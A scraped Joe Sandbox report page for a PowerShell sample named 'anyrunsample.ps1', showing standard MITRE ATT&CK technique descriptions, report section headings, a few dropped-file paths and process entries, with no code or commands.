Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report anyrunsample.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gibbqjar.3fk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvh2smtk.rhv.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5ME66MQ1J5VZ22GGHA1.temp

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: powershell.exePID: 6336, Parent PID: 2580

General

Chronological Activities

Analysis Process: conhost.exePID: 6380, Parent PID: 6336

Windows Analysis Report
anyrunsample.ps1